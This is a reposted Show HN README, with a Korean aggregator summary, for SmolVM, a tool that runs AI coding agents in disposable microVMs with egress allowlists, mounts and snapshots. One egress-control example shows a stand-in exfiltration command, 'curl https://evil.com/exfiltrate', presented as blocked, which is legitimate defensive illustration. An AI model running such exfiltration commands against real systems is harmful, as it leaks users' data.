Show HN: Run coding agents in a sandbox locally

hackernews | | 📦 오픈소스
#ai #openai #tip #가상머신 #샌드박스 #에이전트 #오픈소스 #ai 에이전트 #claude #gemini #실행 환경
원문 출처: hackernews · Genesis Park에서 요약 및 분석

요약

SmolVM은 0.5초 만에 부팅되는 일회용 가상머신을 제공해 AI 에이전트가 안전하게 코드를 실행할 수 있게 합니다. 컨테이너보다 강력한 하드웨어 격리 기술을 통해 호스트 시스템을 보호하며, 필요 시 상태를 저장하거나 브라우저 및 로컬 디렉터리에 접근할 수 있습니다.

본문

SmolVM gives AI agents their own disposable computer. Each microVM boots in milliseconds, runs any code or software you throw at it, keeps state when you need it, and vanishes when you don't — nothing touches your host. - Sub-second boot — VMs ready in ~500 ms. - Hardware isolation — Stronger security than containers. - Network controls — Domain allowlists for egress filtering. - Browser sessions — Full browser agents can see and control. - Host mounts — Give sandboxes read access to local directories. - Snapshots — Save and restore VM state instantly. - Coding agents — Start enviornment with a pre-installed coding agent. - OpenClaw — GUI Linux apps inside a sandbox. - Run untrusted code safely. Execute AI-generated code in an isolated sandbox instead of on your machine. - Give agents a browser. Spin up a full browser session that agents can see and control in real time. - Let agents read your project. Mount a local directory so agents can explore your codebase inside a sandbox. - Keep state across turns. Reuse the same sandbox throughout a multi-step workflow. Install SmolVM with a single command: curl -sSL https://celesto.ai/install.sh | bash This installs everything you need (including Python), configures your machine, and verifies the setup. Manual installation pip install smolvm smolvm setup smolvm doctor On supported Linux and macOS systems, pip install smolvm also pulls in the matching smolvm-core wheel automatically. Most users do not need Rust installed. Linux may prompt for sudo during setup so it can install host dependencies and configure runtime permissions. For golden-AMI builds, two-stage deploys, pinning the Firecracker version, and other non-default install paths, see docs/installation.md. from smolvm import SmolVM vm = SmolVM() result = vm.run("echo 'Hello from the sandbox!'") print(result) vm.stop() Create a sandbox, check that it's running, then stop it: smolvm create --name my-sandbox # my-sandbox running 172.16.0.2 smolvm list # NAME STATUS IP # my-sandbox running 172.16.0.2 smolvm stop my-sandbox Open a shell inside a running sandbox: smolvm ssh my-sandbox It sucks to “press enter and accept changes” every few seconds while using coding agents. SmolVM makes it easy to isolate the agent coding environment from the host (laptops). With a single command you get a claude/codex pre-installed sandbox ready with git credential to make you build a billion dollar business without making any mistake ;) smolvm codex start # start a new environment with codex preinstalled smolvm claude start # start a new environment with codex preinstalled SmolVM can also start a full browser inside a sandbox. This is useful when agents need to navigate websites, fill out forms, or take screenshots. Start a browser session with a live view you can watch in your own browser: smolvm browser start --live # Session: sess_a1b2c3 # Live view: http://localhost:6080 Open the URL to watch the browser in real time. When you're done, list and stop sessions: smolvm browser list smolvm browser stop sess_a1b2c3 See examples/browser_session.py for the Python equivalent. By default, sandboxes have full internet access. You can restrict which domains a sandbox can reach by passing internet_settings : from smolvm import SmolVM vm = SmolVM(internet_settings={ "allowed_domains": ["https://api.openai.com"], }) vm.run("curl https://api.openai.com/v1/models") # allowed vm.run("curl https://evil.com/exfiltrate") # blocked See docs/concepts/network-egress-controls.md for how it works under the hood. You can give a sandbox read access to a folder on your machine. This is useful when an agent needs to work with an existing project without copying files back and forth. smolvm create --mount ~/Projects/my-app smolvm ssh my-sandbox ls /workspace # your host files appear here The host folder is read-only — the sandbox can read every file, but changes stay inside the sandbox and never touch the originals. If the agent creates or edits files under /workspace , those changes live only in the VM's overlay layer. Mount at a custom path, or mount multiple directories: smolvm create --mount ~/Projects/my-app:/code --mount ~/data:/mnt/data The same works from Python: from smolvm import SmolVM with SmolVM(mounts=["~/Projects/my-app"]) as vm: result = vm.run("ls /workspace") print(result.stdout) Note: This feature is read-only for now. Any changes you make inside the sandbox do not travel back to the host. Write-back support is planned for a future release. | What you'll learn | Example | |---|---| | Run code in a sandbox | quickstart_sandbox.py | | Start a browser session | browser_session.py | | Pass environment variables into a sandbox | env_injection.py | These examples show how to wrap SmolVM as a tool for popular agent frameworks, so an AI model can run shell commands or drive a browser through your sandbox. | Framework | Example | |---|---| | OpenAI Agents | openai_agents_tool.py | | LangChain | langchain_tool.py | | PydanticAI — shell tool | pydanticai_tool.py | | PydanticAI — reusable sandbox across turns | pydanticai_reusable_tool.py | | PydanticAI — browser automation | pydanticai_agent_browser.py | | Computer use (click and type) | computer_use_browser.py | | What it does | Example | |---|---| | Install and run OpenClaw inside a Debian sandbox with a 4 GB root filesystem | openclaw.py | Each script shows its own pip install ... line when it needs extra packages. SmolVM automatically trusts new sandboxes on first connection to keep setup simple. This is safe for local development, but you should not expose sandbox network ports publicly without extra controls. See SECURITY.md for the full policy and scope. SmolVM ships a benchmark suite that measures the timings AI agents actually feel: cold start, time-to-interactive, pause/resume, and snapshot create/restore. It drives the public Python SDK on whichever backend is native to your host — Firecracker on Linux, QEMU on macOS. Run it locally: uv run python scripts/benchmarks/bench.py See scripts/benchmarks/README.md for flags, output format, and what each metric means. See CONTRIBUTING.md to get started. Apache 2.0 — see LICENSE for details.

Genesis Park 편집팀이 AI를 활용하여 작성한 분석입니다. 원문은 출처 링크를 통해 확인할 수 있습니다.

공유

관련 저널 읽기

전체 보기 →